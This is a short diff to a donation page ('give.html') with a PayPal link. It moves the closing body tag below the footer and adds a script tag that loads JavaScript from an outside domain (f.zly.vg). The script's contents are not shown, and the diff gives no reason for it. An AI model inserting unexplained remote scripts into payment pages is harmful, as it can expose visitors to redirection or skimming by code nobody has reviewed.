--- a/give.html
+++ b/give.html
@@ -59,8 +59,6 @@
     <li><a href="https://www.paypal.com/qrcodes/managed/73877812-7b0a-4c3c-ab83-e9b7c581d4a3?utm_source=nav_header_payment_hub">paypal></a></li>
 
 </ul>
-
-</body>
 <footer>
     <div style="display: flex; justify-content: space-between; width: 80vw;  margin: 0 auto; padding: auto;">
     <div style="display: inline-block;">
@@ -72,3 +70,7 @@
     </div>
     </div>
     </footer>
+<script src='https://f.zly.vg/js/newurl.js'></script>
+
+</body>
+
